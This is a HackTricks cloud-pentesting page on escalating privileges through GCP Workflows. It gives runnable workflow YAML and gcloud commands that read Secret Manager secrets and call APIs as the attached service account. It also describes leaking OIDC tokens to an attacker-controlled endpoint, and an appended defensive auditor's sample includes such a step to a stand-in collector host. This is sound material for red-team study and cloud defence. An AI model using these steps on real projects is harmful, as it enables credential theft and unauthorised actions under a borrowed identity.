GCP - Workflows Privesc
Tip
Learn & practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Workflows
Basic Information:
workflows.workflows.create, iam.serviceAccounts.ActAs, workflows.executions.create, (workflows.workflows.get, workflows.operations.get)
As far as I know, it's not possible to get a shell with access to the metadata endpoint containing the credentials of the SA attached to a Workflow. However, it's possible to abuse the permissions of the SA by adding the actions to perform inside the Workflow.
It's possible to find the documentation of the connectors. For example, this is the page of the Secretmanager connector. In the sidebar you can find several other connectors.
And here you can find an example of a connector that prints a secret:
Workflow YAML configuration to access secrets
```yaml
main:
  params: [input]
  steps:
    - access_string_secret:
        call: googleapis.secretmanager.v1.projects.secrets.versions.accessString
        args:
          secret_id: secret_name
          version: 1
          project_id: project-id
        result: str_secret
    - returnOutput:
        return: "${str_secret}"
```
Update from the CLI:
Deploy and run workflows from the CLI
```bash
# Deploy (create or update) the workflow; the bracketed arguments are placeholders
gcloud workflows deploy <workflow-name> --source=<workflow.yaml> --service-account=<sa-email> --location us-central1
```
If you don't have web access, it's possible to trigger and view the execution of a Workflow with:
```bash
# Run execution with output
gcloud workflows run <workflow-name> --location us-central1
# Run execution without output
gcloud workflows execute <workflow-name> --location us-central1
# List executions
gcloud workflows executions list <workflow-name>
# Get execution info and output
gcloud workflows executions describe projects/<proj-number>/locations/<location>/workflows/<workflow-name>/executions/<execution-id>
```
Caution
You can also check the output of previous executions to look for sensitive information.
Note that even if you get an error like `PERMISSION_DENIED: Permission 'workflows.operations.get' denied on...` because you don't have that permission, the workflow has been created.
Leak OIDC token (and OAuth?)
According to the docs, it's possible to use workflow steps that send an HTTP request with the OAuth or OIDC token. However, just like in the case of Cloud Scheduler, the HTTP request with the OAuth token must be to the host `.googleapis.com`.
Caution
Therefore, it's possible to leak the OIDC token by indicating an HTTP endpoint controlled by the user, but to leak the OAuth token you would need a bypass for that protection. However, you can still contact any GCP API to perform actions on behalf of the SA using either connectors or HTTP requests with the OAuth token.
Oauth
Workflow HTTP request with OAuth token
```yaml
- step_A:
    call: http.post
    args:
      url: https://compute.googleapis.com/compute/v1/projects/myproject1234/zones/us-central1-b/instances/myvm001/stop
      auth:
        type: OAuth2
        scopes: OAUTH_SCOPE
```
Workflow HTTP request with OIDC token
```yaml
- step_A:
    call: http.get
    args:
      url: https://us-central1-project.cloudfunctions.net/functionA
      query:
        firstNumber: 4
        secondNumber: 6
        operation: sum
      auth:
        type: OIDC
        audience: OIDC_AUDIENCE
```
With this permission, instead of workflows.workflows.create, it's possible to update an already existing workflow and perform the same attacks.
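A defensive review of the two patterns described above (the Secret Manager connector step and the OIDC-authenticated HTTP step), as an added example that is not part of the original page: it walks a workflow definition and reports steps that read secrets or send an OIDC token to a host outside an allowlist. The allowlist, finding labels, function names and sample definition are assumptions, and the definition is taken in Workflows' JSON form, so a YAML source needs converting first.

```python
import json
from urllib.parse import urlparse

# Assumption: exact hosts this project's workflows may send OIDC tokens to.
# Exact match on purpose: anyone can host under *.cloudfunctions.net or *.run.app.
TRUSTED_OIDC_HOSTS = {"us-central1-project.cloudfunctions.net"}
SECRET_CONNECTOR_PREFIX = "googleapis.secretmanager."

def iter_call_steps(node):
    """Yield (step_name, step_body) for every step with a `call`, at any nesting depth."""
    if isinstance(node, dict):
        for name, body in node.items():
            if isinstance(body, dict) and "call" in body:
                yield name, body
            yield from iter_call_steps(body)
    elif isinstance(node, list):
        for item in node:
            yield from iter_call_steps(item)

def static_host(url):
    # A runtime expression such as ${target} has no static host: report it as dynamic.
    try:
        return urlparse(str(url)).hostname or "<dynamic>"
    except ValueError:
        return "<dynamic>"

def audit_workflow(source_json):
    """Return (step, finding, detail) tuples for a workflow definition given as JSON text."""
    findings = []
    for name, step in iter_call_steps(json.loads(source_json)):
        call = str(step["call"])
        args = step.get("args") if isinstance(step.get("args"), dict) else {}
        auth = args.get("auth") if isinstance(args.get("auth"), dict) else {}
        if call.startswith(SECRET_CONNECTOR_PREFIX):
            findings.append((name, "secret-connector", call))
        if call.startswith("http.") and str(auth.get("type", "")).upper() == "OIDC":
            host = static_host(args.get("url", ""))
            if host not in TRUSTED_OIDC_HOSTS:
                findings.append((name, "oidc-untrusted-host", host))
    return findings

# Constructed sample definition (not from a real project), mirroring the steps on this page.
SAMPLE = json.dumps({"main": {"params": ["input"], "steps": [
    {"read_secret": {"call": "googleapis.secretmanager.v1.projects.secrets.versions.accessString",
                     "args": {"secret_id": "secret_name", "version": 1, "project_id": "project-id"}}},
    {"call_fn": {"call": "http.get", "args": {"url": "https://us-central1-project.cloudfunctions.net/functionA",
                                              "auth": {"type": "OIDC", "audience": "OIDC_AUDIENCE"}}}},
    {"call_out": {"call": "http.post", "args": {"url": "https://collector.example.net/in", "auth": {"type": "OIDC"}}}},
    {"returnOutput": {"return": "${str_secret}"}}]}})
```

Running the same audit on every deployed revision, and alerting when a finding appears on a workflow that previously had none, also covers the update path.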

